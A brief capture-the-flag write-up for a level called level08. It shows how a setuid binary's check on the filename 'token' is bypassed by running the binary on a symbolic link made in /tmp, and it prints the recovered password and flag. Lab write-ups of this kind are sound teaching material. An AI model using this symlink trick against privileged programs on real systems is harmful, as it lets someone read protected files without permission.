Inside the home folder, we can find two files owned by `flag08` user.

Command: `ls -l`  
Output:
```
total 16
-rwsr-s---+ 1 flag08 level08 8617 Mar  5  2016 level08
-rw-------  1 flag08 flag08    26 Mar  5  2016 token
```

`token` file has read/write permission only for `flag08` user, so it's impossible to open it directly.

`level08` - binary file with few `if/else` condition inside. It just takes file name open it, read and print content.
First `if` checks that there one argument provided, the second one - that file name not equal `token`.

The solution is simple - we need to create a symbolic link to `token` file and run `level08` binary with the path to this link in argument.

Command: `cd /tmp && ln -sf ~/token link && ~/level08 link`  
Output: `quif5eloekouj29ke0vouxean`

User: `flag08`  
Password: `quif5eloekouj29ke0vouxean`

Flag: `25749xKZ8L7DkSCwJkT9dyv6f`